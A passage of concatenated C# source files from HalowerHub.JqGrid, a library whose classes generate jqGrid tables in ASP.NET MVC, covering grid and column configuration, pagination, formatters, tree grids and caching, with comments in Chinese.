public GridGenerator<T> SubGridAsForm(string url, string pTabKeyName = null)
{
GridConfiguration.SubGrid = true;
var baseUrl = string.IsNullOrEmpty(pTabKeyName) ? url + "/" : url + "?" + pTabKeyName + "=";
const string templete = @"&function(subgrid_id, row_id){var subgrid_table_id = subgrid_id+'_t';jQuery.get('@baseUrl'+row_id, function(result) {jQuery('#'+subgrid_id).empty().html(result)});}&";
GridConfiguration.SubGridRowExpanded =
templete.Replace("@baseUrl", baseUrl).Replace("\"&", "").Replace("&\"", "");
return this;
}
/// <summary>
/// 设置表格主键
/// </summary>
/// <param name="expandColumn">树形列</param>
/// <param name="treeIcon">树图标</param>
/// <returns></returns>
public GridGenerator<T> AsTreeGrid(string expandColumn, string treeIcon = "ui-icon-document-b")
{
GridConfiguration.TreeGrid = true;
GridConfiguration.TreeGridModel = "adjacency";
GridConfiguration.ExpandColumn = expandColumn;
GridConfiguration.TreeIcons = "&{leaf:'" + treeIcon + "'}&";
return this;
}
/// <summary>
/// 设置表格主键
/// </summary>
/// <param name="gridKey">表格主键</param>
/// <returns></returns>
public GridGenerator<T> GridKey(string gridKey)
{
GridConfiguration.GridKey = gridKey;
return this;
}
/// <summary>
/// 清除缓存(建议在开发阶段使用)
/// </summary>
/// <returns></returns>
public GridGenerator<T> PerClearCache()
{
GridConfiguration.PerClearCache = true;
return this;
}
/// <summary>
/// 启用内置操作类型
/// </summary>
/// <param name="gridOperatorTypes">内置操作类型</param>
/// <returns></returns>
public GridGenerator<T> BuiltInOperation(GridOperators gridOperatorTypes)
{
if (gridOperatorTypes.HasFlag(GridOperators.Add))
GridConfiguration.GridOperation.Add = true;
if (gridOperatorTypes.HasFlag(GridOperators.Edit))
GridConfiguration.GridOperation.Edit = true;
if (gridOperatorTypes.HasFlag(GridOperators.Delete))
GridConfiguration.GridOperation.Delete = true;
if (gridOperatorTypes.HasFlag(GridOperators.Search))
GridConfiguration.GridOperation.Search = true;
if (gridOperatorTypes.HasFlag(GridOperators.Refresh))
GridConfiguration.GridOperation.Refresh = true;
return this;
}
/// <summary>
/// 配置图标及文字
/// </summary>
/// <param name="operationIcontext"></param>
/// <returns></returns>
public GridGenerator<T> OperationIconText(GridOperation operationIcontext)
{
GridConfiguration.GridOperation = operationIcontext;
return this;
}
/// <summary>
/// 表头
/// </summary>
/// <param name="groupHeaders"></param>
/// <returns></returns>
public GridGenerator<T> GroupHeaders(params GroupHeader[] groupHeaders)
{
GridConfiguration.GroupHeaders = true;
GridConfiguration.ColSPanConfiguation.UseColSpanStyle = true;
GridConfiguration.ColSPanConfiguation.GroupHeaders = groupHeaders;
return this;
}
/// <summary>
/// 表格生成器
/// </summary>
/// <returns></returns>
public string ToHtmlString()
{
var cacheValue = GridConfiguration.PerClearCache ? null : CacheHelper.Get("JqGird_Config_" + _gridId);
if (cacheValue != null)
{
return cacheValue.ToString().Replace("\"&", "").Replace("&\"", "").Replace("\\", "");
}//
string template = @"
<!--该表格由HalwerHub.JqGrid自动生成,联系QQ:121625933-->
<table id='@Model.GridId'></table>
<div id ='@Model.PagerId'></div >
<script type='text/javascript'>
jQuery(function(){
@Model.TableInitCommand
@Model.BottomNavBarInitCommand
@Model.GroupHeaderInitCommand
@Model.MergerColumnInitCommand
});
</script>";
var initCommand = new RenderInitCommand();
initCommand.GridId = _gridId;
initCommand.GroupHeaderInitCommand= GridConfiguration.GroupHeaders? "jQuery('#" + _gridId + "').jqGrid('setGroupHeaders'," +GridConfiguration.ColSPanConfiguation.IgnoreNullSerialize() + ")": "";
initCommand.TableInitCommand = "jQuery('#" + _gridId + "').jqGrid("+GridConfiguration.IgnoreNullSerialize()+")";
initCommand.PagerId = GridConfiguration.PagerId?.Substring(1);
var colNames = GridConfiguration.GridColumns.Where(col => col.CellAttr != null).ToList();
if (colNames.Any())
{
GridConfiguration.GridComplete = @"&function() {" + colNames.Aggregate("", (current, col) => current + ("Merger(\'" + _gridId + "\', \'" + col.Field + "\');")) + "}&";
initCommand.MergerColumnInitCommand = "function Merger(gridName, cellName) { var mya = $('#' + gridName + '').getDataIDs(); var length = mya.length;for (var i = 0; i < length; i++){ var before = $('#' + gridName + '').jqGrid('getRowData', mya[i]); var rowSpanTaxCount = 1; for (j = i + 1; j <= length; j++) { var end = $('#' + gridName + '').jqGrid('getRowData', mya[j]); if (before[cellName] == end[cellName]) { rowSpanTaxCount++;$('#' + gridName + '').setCell(mya[j], cellName, '', { display: 'none' }); } else { rowSpanTaxCount = 1; break; }$('td[aria-describedby=' + gridName +'_' + cellName +']', '#' + gridName +'').eq(i).attr('rowspan', rowSpanTaxCount);}}};";
}
initCommand.BottomNavBarInitCommand= "$('#" + _gridId + "').jqGrid( 'navGrid' , '#"+ initCommand.PagerId + "'," + GridConfiguration.GridOperation.IgnoreNullSerialize() + ",{},{},{},{" + (GridConfiguration.MultiSearch ? "multipleSearch:true" : "") + "},{});";
var config = new TemplateServiceConfiguration {EncodedStringFactory = new RawStringFactory()};
var service = RazorEngineService.Create(config);
var result = service.RunCompile(template,"templateKey", typeof(RenderInitCommand), initCommand);
CacheHelper.Add("JqGird_Config_" + _gridId, result, 5);
return result.Replace("\"&", "").Replace("&\"", "").Replace("\\", "");
}
#endregion
}
}
<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展 子表格
*****************************************************/
using System.Collections.Generic;
using System.Linq;
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class SubGridTable
{
public SubGridTable(params GridColumn[] subGridConfig)
{
var columns = new List<GridColumn>();
columns.AddRange(subGridConfig);
GridColumns = columns;
}
[JsonIgnore]
public List<GridColumn> GridColumns { get; set; }
#region 属性
[JsonProperty("url")]
public string Url { get; set; }
[JsonProperty("name")]
public string[] ColNames
{
get { return GridColumns.ToList().Select(c => c.DisplayName).ToArray(); }
}
[JsonProperty("width")]
public int[] ColWidths
{
get { return GridColumns.ToList().Select(c => c.Width ?? 20).ToArray(); }
}
[JsonProperty("align")]
public string[] Aligns
{
get { return GridColumns.ToList().Select(c => c.Align ?? "right").ToArray(); }
}
#endregion
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展分页
*****************************************************/
using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Text;
using System.Web.Mvc;
namespace HalowerHub.JqGrid
{
public static class GridPagerExtention
{
/// <summary>
/// 接管IList
/// </summary>
/// <typeparam name="T">实体类</typeparam>
/// <param name="list">数据集</param>
/// <param name="baseContent">控制器对象</param>
/// <param name="filter">过滤表达式</param>
/// <param name="order">排序表达式</param>
/// <returns></returns>
public static string Pagination<T>(this IQueryable<T> list, Controller baseContent, Expression<Func<T, bool>> filter = null, Expression<Func<T, object>> order = null) where T : class
{
var pageParams = RequestHelper.InitRequestParams(baseContent);
var predicate = PredicateBuilder.True<T>();
if (filter != null) predicate = predicate.And(filter);
if (!string.IsNullOrEmpty(pageParams.Filters))
predicate = GridSearchPredicate.MultiSearchExpression<T>(pageParams.Filters);
if (string.IsNullOrEmpty(pageParams.Filters) && !string.IsNullOrEmpty(pageParams.SearchField))
predicate = GridSearchPredicate.SingleSearchExpression<T>(pageParams.SearchField, pageParams.SearchOper,pageParams.SearchString);
var temp = list.Where(predicate.Compile()).ToList();
var compare = new GridListSort<T>(string.IsNullOrEmpty(pageParams.SortName) ? pageParams.Gridkey : pageParams.SortName, pageParams.Sord == "desc");
temp.Sort(compare.Compare);
var recordes = temp.Skip((pageParams.PageIndex - 1)*pageParams.PageSize).Take(pageParams.PageSize).ToList();
var gridCells = recordes.Select(p => new GridCell
{
Id = p.GetType().GetProperty(pageParams.Gridkey).GetValue(p, null).ToString(),
Cell = GetObjectPropertyValues(p, pageParams.Displayfileds.Split(','))
}).ToList();
var result =
new
{
pageParams.PageIndex,
records = temp.Count(predicate.Compile()),
rows = gridCells,
total = (Math.Ceiling((double)temp.Count() / pageParams.PageSize))
}.ToSerializer();
return result;
}
/// <summary>
/// IList 接管
/// </summary>
/// <typeparam name="T"></typeparam>
/// <param name="list"></param>
/// <param name="baseContent"></param>
/// <param name="expression"></param>
/// <returns></returns>
public static string Pagination<T>(this IEnumerable<T> list, Controller baseContent,
Expression<Func<T, bool>> expression = null) where T : class
{
return Pagination(list.AsQueryable(), baseContent, expression);
}
/// <summary>
/// 推送到子表格
/// </summary>
/// <param name="list"></param>
/// <param name="baseContent"></param>
/// <typeparam name="T"></typeparam>
/// <returns></returns>
public static string PushSubGrid<T>(this IEnumerable<T> list, Controller baseContent) where T : class
{
var pageParams = RequestHelper.InitRequestParams(baseContent);
var gridCells = list.Select(p => new GridCell
{
Id = p.GetType().GetProperty(pageParams.Gridkey).GetValue(p, null).ToString(),
Cell = GetObjectPropertyValues(p, pageParams.Displayfileds.Split(','))
}).ToList();
var result = new { rows = gridCells }.ToSerializer();
return result;
}
private static string[] GetObjectPropertyValues<T>(T t, IEnumerable<string> filderSortOrder)
{
var type = typeof(T);
return filderSortOrder.Select(filedName => type.GetProperty(filedName).GetValue(t, null) == null
? string.Empty
: type.GetProperty(filedName).GetValue(t, null).ToString()).ToArray();
}
/// <summary>
/// 构建搜索下拉框
/// </summary>
/// <typeparam name="T"></typeparam>
/// <param name="list"></param>
/// <param name="keySelector"></param>
/// <param name="elementSelector"></param>
/// <returns></returns>
public static string BuildSelect<T>(this IEnumerable<T> list, Func<T, object> keySelector, Func<T, object> elementSelector) where T : class
{
var dic = list.ToDictionary(keySelector, elementSelector);
var selectBuilder = new StringBuilder("<select>");
selectBuilder.Append("<option value =''>请选择</option>");
foreach (var item in dic)
{
selectBuilder.AppendFormat("<option value ='{0}'>{1}</option>", item.Key, item.Value);
}
selectBuilder.Append("</select>");
return selectBuilder.ToString();
}
/// <summary>
/// 树表格
/// </summary>
/// <param name="list"></param>
/// <param name="baseContent"></param>
/// <param name="expression"></param>
/// <typeparam name="T"></typeparam>
/// <returns></returns>
public static string ToTreeGrid<T>(this IEnumerable<T> list, Controller baseContent, Expression<Func<T, bool>> expression = null) where T : JGridTree
{
var pageParams = RequestHelper.InitRequestParams(baseContent);
var predicate = PredicateBuilder.True<T>();
if (expression != null) predicate = predicate.And(expression);
if (!string.IsNullOrEmpty(pageParams.Filters))
predicate = GridSearchPredicate.MultiSearchExpression<T>(pageParams.Filters);
if (string.IsNullOrEmpty(pageParams.Filters) && !string.IsNullOrEmpty(pageParams.SearchField))
predicate = GridSearchPredicate.SingleSearchExpression<T>(pageParams.SearchField, pageParams.SearchOper,
pageParams.SearchString);
var recordes =
list.Where(predicate.Compile())
.Skip((pageParams.PageIndex - 1) * pageParams.PageSize)
.Take(pageParams.PageSize)
.ToList();
recordes.Sort(
new GridListSort<T>(
string.IsNullOrEmpty(pageParams.SortName) ? pageParams.Gridkey : pageParams.SortName,
pageParams.Sord == "desc").Compare);
var gridCells = recordes.Select(p => new GridCell
{
Id = p.GetType().GetProperty(pageParams.Gridkey).GetValue(p, null).ToString(),
Cell = GetObjectPropertyValues(p,(pageParams.Displayfileds + ",TreeLevel,Parent,IsLeaf,Expanded").Split(','))
}).ToList();
var result =
new
{
pageParams.PageIndex,
records = list.Count(predicate.Compile()),
rows = gridCells,
total = (Math.Ceiling((double)list.Count() / pageParams.PageSize))
}.ToSerializer();
return result;
}
}
}
<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-03-21
** 描述:jqGrid查询扩展
*****************************************************/
using System.Web.Mvc;
namespace HalowerHub.JqGrid
{
/// <summary>
/// Grid 工厂扩展方法。
/// </summary>
public static class GridFactoryExtensions
{
/// <summary>
/// Grid
/// </summary>
/// <param name="htmlHelper">Html 助手</param>
/// <returns>Grid 工厂</returns>
public static GridFacotory JqGridKit(this HtmlHelper htmlHelper)
{
return new GridFacotory(htmlHelper);
}
/// <summary>
/// Grid
/// </summary>
/// <typeparam name="TModel">模型类型</typeparam>
/// <param name="htmlHelper">Html 助手</param>
/// <returns>Grid 工厂</returns>
public static GridFacotory<TModel> JqGridKit<TModel>(this HtmlHelper<TModel> htmlHelper)
{
return new GridFacotory<TModel>(htmlHelper);
}
}
}<file_sep>using System.Reflection;
using System.Runtime.InteropServices;
// 有关程序集的一般信息由以下
// 控制。更改这些特性值可修改
// 与程序集关联的信息。
[assembly: AssemblyTitle("HalowerHub.JqGrid")]
[assembly: AssemblyDescription("HalowerHub.JqGrid(ForMvc) is most simple and popular JqGrid plugin that can be used to quickly create a commercial request form. We are also pursuing: \"write less, do more\", if you have any questions or help with it you can send email to me or contact me QQ:121625933")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Halower(<EMAIL>)")]
[assembly: AssemblyProduct("HalowerHub.JqGrid")]
[assembly: AssemblyCopyright("Copyright © Halower 2015")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
//将 ComVisible 设置为 false 将使此程序集中的类型
//对 COM 组件不可见。 如果需要从 COM 访问此程序集中的类型,
//请将此类型的 ComVisible 特性设置为 true。
[assembly: ComVisible(false)]
// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
[assembly: Guid("3059fb75-1026-4ec8-a010-d819415c4600")]
// 程序集的版本信息由下列四个值组成:
//
// 主版本
// 次版本
// 生成号
// 修订号
//
//可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值,
// 方法是按如下所示使用“*”: :
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("5.1.1.1")]
[assembly: AssemblyFileVersion("5.1.1.1")]<file_sep>using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class JGridTree
{
[JsonProperty("level")]
public virtual string TreeLevel { get; set; }
[JsonProperty("isLeaf")]
public virtual string IsLeaf { get; set; }
[JsonProperty("parent")]
public virtual string Parent { get; set; }
[JsonProperty("expanded")]
public virtual string Expanded { get; set; }
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-1-21
** 描述:jqGrid扩展
*****************************************************/
namespace HalowerHub.JqGrid
{
public class GridConfigBuilder
{
#region 属性
private GridConfiguration GridConfiguration { get; set; }
#endregion
#region 构造函数
public GridConfigBuilder()
{
GridConfiguration = new GridConfiguration();
}
private GridConfigBuilder(string gridId) : this()
{
}
public GridConfigBuilder(string gridId, GridConfiguration gridConfiguration) : this(gridId)
{
GridConfiguration = gridConfiguration;
}
#endregion
#region 字段
#endregion
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展枚举
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum ResponseDatas
{
/// <summary>
/// xml数据
/// </summary>
Xml,
/// <summary>
/// xml字符串
/// </summary>
Xmlstring,
/// <summary>
/// JSON数据
/// </summary>
Json,
/// <summary>
/// JSON字符串
/// </summary>
Jsonstring,
/// <summary>
/// 客户端数据(数组)
/// </summary>
Local,
/// <summary>
/// javascript数据
/// </summary>
Javascript,
/// <summary>
/// 函数返回数据
/// </summary>
Function
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展单元列属性
*****************************************************/
using System.Collections.Generic;
namespace HalowerHub.JqGrid
{
public static class GridColumnExtension
{
/// <summary>
/// 设置列的初始宽度,可用pixels和百分比
/// </summary>
/// <param name="width">初始宽度</param>
/// <returns></returns>
public static GridColumn Width(this GridColumn col, int width)
{
col.Width = width;
return col;
}
/// <summary>
/// 定义初始化时,列是否隐藏
/// </summary>
public static GridColumn Hidden(this GridColumn col, bool hidden = true)
{
col.Hidden = hidden;
return col;
}
/// <summary>
/// 设置字段位置
/// </summary>
/// <param name="contentAlign">字段位置</param>
/// <returns></returns>
public static GridColumn ContentAlign(this GridColumn col, string contentAlign)
{
col.Align = contentAlign;
return col;
}
/// <summary>
/// 定义字段是否可编辑
/// </summary>
public static GridColumn Editable(this GridColumn col, ColumnEdits edittype, string editoptions, EditRules rules = null)
{
col.Editable = true;
col.EditType = edittype.ToString().ToLower();
col.Editoptions = "&{" + editoptions + "}&";
col.EditRule = rules;
return col;
}
/// <summary>
/// 定义编辑规则
/// </summary>
/// <param name="col"></param>
/// <param name="editRules"></param>
/// <returns></returns>
public static GridColumn EditRules(this GridColumn col, EditRules editRules)
{
col.EditRule = editRules;
return col;
}
/// <summary>
/// 定义定义字段是否可编辑
/// </summary>
public static GridColumn Formatter(this GridColumn col, CellFormatters cellformater,Formatoption formatoption=null)
{
col.Formatter ="\""+cellformater.ToString().ToLower()+"\"";
col.Formatoptions =formatoption;
return col;
}
/// <summary>
/// 整数格式化器
/// </summary>
/// <param name="col"></param>
/// <param name="thousandsSeparator">千分位分隔符</param>
/// <param name="defautlValue">在没有数据的情况下的默认值</param>
/// <returns></returns>
public static GridColumn IntegerFormatter(this GridColumn col,string thousandsSeparator,string defautlValue=null)
{
col.Formatter = "\"" + CellFormatters.Integer.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { ThousandsSeparator = thousandsSeparator, DefaulValue = defautlValue };
return col;
}
/// <summary>
/// 数字格式化器
/// </summary>
/// <param name="col"></param>
/// <param name="thousandsSeparator">千分位分隔符</param>
/// <param name="decimalPlaces">小数保留位数</param>
/// <param name="decimalSeparator">小数分隔符 如”.”</param>
/// <param name="defautlValue">在没有数据的情况下的默认值</param>
/// <returns></returns>
public static GridColumn NumberFormatter(this GridColumn col, string thousandsSeparator,string decimalPlaces=null, string decimalSeparator=null,string defautlValue = null)
{
col.Formatter = "\"" + CellFormatters.Number.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { ThousandsSeparator = thousandsSeparator, DefaulValue = defautlValue,DecimalPlaces= decimalPlaces,DecimalSeparator=decimalSeparator };
return col;
}
/// <summary>
/// 金钱格式化器
/// </summary>
/// <param name="col"></param>
/// <param name="prefix">前缀</param>
/// <param name="suffix">后缀</param>
/// <param name="thousandsSeparator">千分位分隔符</param>
/// <param name="decimalPlaces">小数保留位数</param>
/// <param name="decimalSeparator">小数分隔符 如”.”</param>
/// <param name="defautlValue">在没有数据的情况下的默认值</param>
/// <returns></returns>
public static GridColumn CurrencyFormatter(this GridColumn col,string prefix="¥", string decimalPlaces = null, string suffix=null, string thousandsSeparator=null, string decimalSeparator = null, string defautlValue = null)
{
col.Formatter = "\"" + CellFormatters.Currency.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption {Prefix=prefix,Suffix=suffix,ThousandsSeparator = thousandsSeparator, DefaulValue = defautlValue, DecimalPlaces = decimalPlaces, DecimalSeparator = decimalSeparator };
return col;
}
/// <summary>
/// 时间格式化器
/// </summary>
/// <param name="col"></param>
/// <param name="srcformat">原来的格式</param>
/// <param name="newformat">新的格式</param>
/// <returns></returns>
public static GridColumn DateFormatter(this GridColumn col, string srcformat,string newformat)
{
col.Formatter = "\"" + CellFormatters.Date.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { Srcformat = srcformat, Newformat = newformat };
return col;
}
/// <summary>
/// 链接格式化器
/// </summary>
/// <param name="col"></param>
/// <param name="baseLinkUrl">在当前cell中加入link的url,如”jq/query.action”</param>
/// <param name="addParam">在baseLinkUrl后加入额外的参数,如”&name=aaaa”</param>
/// <param name="idName">默认会在baseLinkUrl后加入,如”.action?id=1″。改如果设置idName=”name”,那么”.action?name=1″。其中取值为当前rowid</param>
/// <returns></returns>
public static GridColumn LinkFormatter(this GridColumn col, string baseLinkUrl=null, string addParam=null,string idName=null)
{
col.Formatter = "\"" + CellFormatters.Showlink.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { BaseLinkUrl = baseLinkUrl, addParam = addParam,IdName= idName };
return col;
}
/// <summary>
/// 复选框格式化器
/// </summary>
/// <param name="col"></param>
/// <param name="disabled">是否选中</param>
/// <returns></returns>
public static GridColumn CheckBoxFormatter(this GridColumn col,bool disabled)
{
col.Formatter = "\"" + CellFormatters.Checkbox.ToString().ToLower() + "\"";
col.Formatoptions = new Formatoption { Disabled = disabled};
return col;
}
/// <summary>
/// 定义搜索
/// </summary>
public static GridColumn Searchable(this GridColumn col, CellTypes filedType = CellTypes.String)
{
col.Search = true;
col.SearchFiledType = filedType;
col.SearchType ="text";
return col;
}
public static GridColumn SelectSearchable(this GridColumn col, string selectDataUrl)
{
col.Search = true;
col.SearchType ="select";
col.SelectDataSourceUrl = selectDataUrl;
return col;
}
/// <summary>
/// 启用排序
/// </summary>
/// <param name="columnSorts">排序类型</param>
/// <returns></returns>
public static GridColumn Sortable(this GridColumn col, ColumnSorts columnSorts = ColumnSorts.Text)
{
col.Sortable = true;
col.SortType = columnSorts.ToString().ToLower();
return col;
}
/// <summary>
/// 文字位置
/// </summary>
/// <param name="col"></param>
/// <param name="align"></param>
/// <returns></returns>
public static GridColumn TextAlign(this GridColumn col, string align)
{
col.Align = align;
return col;
}
/// <summary>
/// 列合并
/// </summary>
/// <param name="col"></param>
/// <param name="align"></param>
/// <returns></returns>
public static GridColumn Merger(this GridColumn col)
{
var templete = @"&function(rowId, tv, rawObject, cm, rdata){return 'id=@FiledName'+ rowId;}&";
col.CellAttr = templete.Replace("@FiledName", "\""+ col.Field+"\"");
return col;
}
}
}
<file_sep>namespace HalowerHub.JqGrid
{
public interface IGridColumn
{
string Field { get; set; }
string Index { get; set; }
int? Width { get; set; }
string Align { get; set; }
string DisplayName { get; set; }
bool Sortable { get; set; }
bool Hidden { get; set; }
bool Editable { get; set; }
bool Search { get; set; }
string SearchType { get; set; }
string SortType { get; set; }
string EditType { get; set; }
string Searchoptions { get; }
string Formatter { get; set; }
string CellAttr { get; set; }
CellTypes SearchFiledType { get; set; }
}
}<file_sep>using System;
using System.Linq.Expressions;
using System.Web.Mvc;
namespace HalowerHub.JqGrid
{
/// <summary>
/// Grid工厂。
/// </summary>
public class GridFacotory
{
/// <summary>
/// Html助手
/// </summary>
internal HtmlHelper HtmlHelper { get; set; }
/// <summary>
/// 初始化一个新的 Grid工厂
/// </summary>
/// <param name="htmlHelper">Html 助手</param>
public GridFacotory(HtmlHelper htmlHelper)
{
HtmlHelper = htmlHelper;
}
}
/// <summary>
/// Grid 泛型工厂。
/// </summary>
/// <typeparam name="TModel">模型类型</typeparam>
public sealed class GridFacotory<TModel> : GridFacotory
{
/// <summary>
/// Html助手。
/// </summary>
public new HtmlHelper<TModel> HtmlHelper { get; set; }
/// <summary>
/// 初始化一个新的 Grid 工厂
/// </summary>
/// <param name="htmlHelper">Html 助手</param>
public GridFacotory(HtmlHelper<TModel> htmlHelper) : base(htmlHelper)
{
HtmlHelper = htmlHelper;
}
/// <summary>
/// 创建表格列
/// </summary>
/// <typeparam name="TProperty">属性类型</typeparam>
/// <param name="expression">属性表达式</param>
/// <param name="width">宽度</param>
/// <param name="isEdit">是否允许编辑</param>
public GridColumn GridColumn<TProperty>(Expression<Func<TModel, TProperty>> expression, int? width = null, bool isEdit = false)
{
var currentProp = ModelMetadata.FromLambdaExpression(expression, HtmlHelper.ViewData);
var column = new GridColumn(currentProp.PropertyName, currentProp.DisplayName)
{
Width = width ?? default(int),
Editable = isEdit
};
return column;
}
public GridColumn GridColumn<TProperty>(Expression<Func<TModel, TProperty>> expression, int width, string formatter)
{
var currentProp = ModelMetadata.FromLambdaExpression(expression, HtmlHelper.ViewData);
var column = new GridColumn(currentProp.PropertyName, currentProp.DisplayName)
{
Width = width,
Formatter = formatter
};
return column;
}
public GridColumn GridColumn(string name, int? width, string formatter)
{
var column = new GridColumn("", name)
{
Width = width ?? default(int),
Formatter = formatter
};
return column;
}
/// <summary>
/// 创建排序属性
/// </summary>
/// <typeparam name="TProperty">属性类型</typeparam>
/// <param name="expression">属性表达式</param>
public string Param<TProperty>(Expression<Func<TModel, TProperty>> expression)
{
var currentProp = ModelMetadata.FromLambdaExpression(expression, HtmlHelper.ViewData);
return currentProp.PropertyName;
}
/// <summary>
/// 创建合并属性
/// </summary>
/// <typeparam name="TProperty">属性类型</typeparam>
/// <param name="expression">属性表达式</param>
public GroupHeader HeaderStruct<TProperty>(Expression<Func<TModel, TProperty>> expression, int colSpan, string content)
{
var currentProp = ModelMetadata.FromLambdaExpression(expression, HtmlHelper.ViewData);
return new GroupHeader(currentProp.PropertyName, colSpan, content);
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace HalowerHub.JqGrid
{
/// <summary>
/// 工具包
/// </summary>
public static class CellBuildKit
{
/// <summary>
/// 构建搜索下拉框
/// </summary>
/// <typeparam name="T"></typeparam>
/// <param name="list"></param>
/// <param name="keySelector"></param>
/// <param name="elementSelector"></param>
/// <returns></returns>
public static string SearchSelect<T>(this IEnumerable<T> list, Func<T, object> keySelector, Func<T, object> elementSelector) where T : class
{
var dic = list.ToDictionary(keySelector, elementSelector);
var selectBuilder = new StringBuilder("<select>");
selectBuilder.Append("<option value =''>请选择</option>");
foreach (var item in dic)
{
selectBuilder.AppendFormat("<option value ='{0}'>{1}</option>", item.Key, item.Value);
}
selectBuilder.Append("</select>");
return selectBuilder.ToString();
}
/// <summary>
/// 构建搜索下拉
/// </summary>
/// <param name="selectDictionary"></param>
/// <returns></returns>
public static string SearchSelect(Dictionary<string,string> selectDictionary)
{
var selectBuilder = new StringBuilder("<select>");
selectBuilder.Append("<option value =''>请选择</option>");
foreach (var item in selectDictionary)
{
selectBuilder.AppendFormat("<option value ='{0}'>{1}</option>", item.Key, item.Value);
}
selectBuilder.Append("</select>");
return selectBuilder.ToString();
}
/// <summary>
/// 构建编辑下拉
/// </summary>
/// <param name="selectDictionary"></param>
/// <returns></returns>
public static string EditSelect(Dictionary<string, string> selectDictionary)
{
var selectBuilder = new StringBuilder("value:'");
foreach (var item in selectDictionary)
{
selectBuilder.Append(item.Key + ":" + item.Value+";");
}
selectBuilder.Remove(selectBuilder.Length - 1, 1).Append("'");
return selectBuilder.ToString();
}
/// <summary>
/// 构建编辑下拉
/// </summary>
/// <returns></returns>
public static string EditCheckbox(string ckv,string unckv)
{
return string.Format("value:'{0}:{1}'", ckv, unckv);
}
/// <summary>
/// 构建文本框
/// </summary>
/// <param name="rows"></param>
/// <param name="cols"></param>
/// <returns></returns>
public static string EditTextarea(int rows, int cols)
{
return string.Format("rows:'{0}',cols:'{1}'", rows, cols);
}
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展单元列属性
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
[JsonObject]
public class GridCell
{
[JsonProperty("id")]
public string Id { get; set; }
[JsonProperty("cell")]
public string[] Cell { get; set; }
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展枚举
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum SortOrders
{
Desc,
Asc
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展枚举
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum ColumnSorts
{
Int,
Number,
Date,
Text
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展属性
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class SubGridModel
{
[JsonProperty("name")]
public string[] FiledNames { get; set; }
[JsonProperty("width")]
public int[] FiledWidths { get; set; }
[JsonProperty("align")]
public string[] FiledAligns { get; set; }
[JsonProperty("params")]
public string[] Params { get; set; }
}
}<file_sep>using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class Formatoption
{
/// <summary>
/// 千分位分隔符 [currency,integer,number]
/// </summary>
[JsonProperty("thousandsSeparator")]
public string ThousandsSeparator { get; set; }
/// <summary>
/// 默认值 [integer,number]
/// </summary>
[JsonProperty("defaulValue")]
public string DefaulValue { get; set; }
/// <summary>
/// 小数分隔符 [currency,number]
/// </summary>
[JsonProperty("decimalSeparator")]
public string DecimalSeparator { get; set; }
/// <summary>
/// 小数保留位数 [currency,number]
/// </summary>
[JsonProperty("decimalPlaces")]
public string DecimalPlaces { get; set; }
/// <summary>
/// 前缀 currency
/// </summary>
[JsonProperty("prefix")]
public string Prefix { get; set; }
/// <summary>
/// 后缀
/// </summary>
[JsonProperty("suffix")]
public string Suffix { get; set; }
/// <summary>
/// 本来格式 [date]
/// </summary>
[JsonProperty("srcformat")]
public string Srcformat { get; set; }
/// <summary>
/// 新格式 [date]
/// </summary>
[JsonProperty("newformat")]
public string Newformat { get; set; }
/// <summary>
/// 在当前cell中加入link的url [showlink]
/// </summary>
[JsonProperty("baseLinkUrl")]
public string BaseLinkUrl { get; set; }
/// <summary>
/// /在baseLinkUrl后加入额外的参数,如&name=aaaa [showlink]
/// </summary>
[JsonProperty("addParam")]
public string addParam { get; set; }
/// <summary>
/// 默认会在baseLinkUrl后加入,如”.action?id=1″[showlink]
/// </summary>
[JsonProperty("idName")]
public string IdName { get; set; }
/// <summary>
/// 默认为true此时的checkbox不能编辑 [checkbox]
/// </summary>
[JsonProperty("disabled ")]
public bool Disabled { get; set; }
}
}<file_sep>using System;
using System.Web;
using System.Web.Caching;
namespace HalowerHub.JqGrid
{
public class CacheHelper
{
public static object Get(string cacheKey)
{
return HttpRuntime.Cache[cacheKey];
}
public static void Add(string cacheKey, object obj, int cacheMinute)
{
HttpRuntime.Cache.Insert(cacheKey, obj, null, DateTime.Now.AddMinutes(cacheMinute),
Cache.NoSlidingExpiration, CacheItemPriority.Normal, null);
}
}
}<file_sep>using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
/// <summary>
/// 编辑验证规则,是作为jqGrid提供的表单验证的规则,类似正则表达式
/// </summary>
public class EditRules
{
